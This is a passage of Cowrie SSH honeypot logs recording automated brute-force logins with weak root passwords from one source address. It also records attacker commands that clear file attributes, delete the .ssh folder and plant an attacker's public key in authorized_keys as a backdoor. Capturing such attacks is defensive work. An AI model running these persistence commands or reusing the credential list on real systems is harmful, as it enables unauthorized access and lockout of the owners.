n-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","blowfish-cbc","twofish-cbc","twofish192-cbc","twofish128-cbc","twofish256-cbc","arcfour","arcfour128","arcfour256","cast128-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-512-96","hmac-sha2-256-96","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-md5-96-etm@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 748f8c627d3f8ff9921d02f86f55ba2c","sensor":"my-vps","timestamp":"2025-09-08T22:08:28.604737Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:30.642623Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.client.size","width":80,"height":60,"message":"Terminal Size: 80 60","sensor":"my-vps","timestamp":"2025-09-08T22:08:31.683393Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:32.192846Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"?","message":"CMD: ?","sensor":"my-vps","timestamp":"2025-09-08T22:08:33.008355Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.failed","input":"?","message":"Command not found: ?","sensor":"my-vps","timestamp":"2025-09-08T22:08:33.009373Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T22:08:33.010499Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T22:08:33.011225Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"ls","message":"CMD: ls","sensor":"my-vps","timestamp":"2025-09-08T22:08:34.037280Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"cd ~","message":"CMD: cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:35.055474Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"> a6s87d6as8zdgtdyas.ini","message":"CMD: > a6s87d6as8zdgtdyas.ini","sensor":"my-vps","timestamp":"2025-09-08T22:08:36.057261Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"ls","message":"CMD: ls","sensor":"my-vps","timestamp":"2025-09-08T22:08:37.092298Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.command.input","input":"exit","message":"CMD: exit","sensor":"my-vps","timestamp":"2025-09-08T22:08:38.118623Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/65afc616b4933530942215be4e78dcb15c7f4f9f8a87de643b46552e10a54924","size":712,"shasum":"65afc616b4933530942215be4e78dcb15c7f4f9f8a87de643b46552e10a54924","duplicate":false,"duration":"5.9","message":"Closing TTY Log: var/lib/cowrie/tty/65afc616b4933530942215be4e78dcb15c7f4f9f8a87de643b46552e10a54924 after 5.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:38.119964Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:39.147915Z","src_ip":"212.227.235.229","session":"00ab29fd6cb2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39464,"dst_ip":"1.2.3.4","dst_port":22,"session":"095e887d98a9","protocol":"ssh","message":"New connection: 212.227.235.229:39464 (1.2.3.4:22) [session: 095e887d98a9]","sensor":"my-vps","timestamp":"2025-09-08T22:08:42.213424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:42.214620Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:42.382818Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.login.success","username":"root","password":"setup123","message":"login attempt [root/setup123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:43.052793Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:43.462620Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:43.463354Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:43.464732Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:43.633969Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:43.994488Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:43.995304Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43852,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fe8e20d8297","protocol":"ssh","message":"New connection: 212.227.235.229:43852 (1.2.3.4:22) [session: 4fe8e20d8297]","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.041157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.041983Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.165671Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.166795Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38966,"dst_ip":"1.2.3.4","dst_port":22,"session":"6630eed80379","protocol":"ssh","message":"New connection: 212.227.235.229:38966 (1.2.3.4:22) [session: 6630eed80379]","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.330395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.331739Z","src_ip":"212.227.235.229","session":"6630eed80379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.355297Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:44.498902Z","src_ip":"212.227.235.229","session":"6630eed80379"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:45.215726Z","src_ip":"212.227.235.229","session":"6630eed80379"}
{"eventid":"cowrie.login.success","username":"root","password":"qweASD123!@#","message":"login attempt [root/qweASD123!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:45.645617Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:46.330655Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.331465Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.332565Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.384436Z","src_ip":"212.227.235.229","session":"6630eed80379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38972,"dst_ip":"1.2.3.4","dst_port":22,"session":"5324c4f23ba9","protocol":"ssh","message":"New connection: 212.227.235.229:38972 (1.2.3.4:22) [session: 5324c4f23ba9]","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.579066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.580141Z","src_ip":"212.227.235.229","session":"5324c4f23ba9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.644476Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:46.762962Z","src_ip":"212.227.235.229","session":"5324c4f23ba9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:08:47.371121Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.372025Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.557635Z","src_ip":"212.227.235.229","session":"5324c4f23ba9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.686384Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.687402Z","src_ip":"212.227.235.229","session":"4fe8e20d8297"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.731214Z","src_ip":"212.227.235.229","session":"095e887d98a9"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.743023Z","src_ip":"212.227.235.229","session":"5324c4f23ba9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43868,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf38382793e3","protocol":"ssh","message":"New connection: 212.227.235.229:43868 (1.2.3.4:22) [session: bf38382793e3]","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.998528Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:47.999497Z","src_ip":"212.227.235.229","session":"bf38382793e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:08:48.312434Z","src_ip":"212.227.235.229","session":"bf38382793e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:08:49.600605Z","src_ip":"212.227.235.229","session":"bf38382793e3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:08:50.914038Z","src_ip":"212.227.235.229","session":"bf38382793e3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57978,"dst_ip":"1.2.3.4","dst_port":22,"session":"71bbc9c835e2","protocol":"ssh","message":"New connection: 212.227.235.229:57978 (1.2.3.4:22) [session: 71bbc9c835e2]","sensor":"my-vps","timestamp":"2025-09-08T22:08:51.226389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:08:51.227880Z","src_ip":"212.227.235.229","session":"71bbc9c835e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 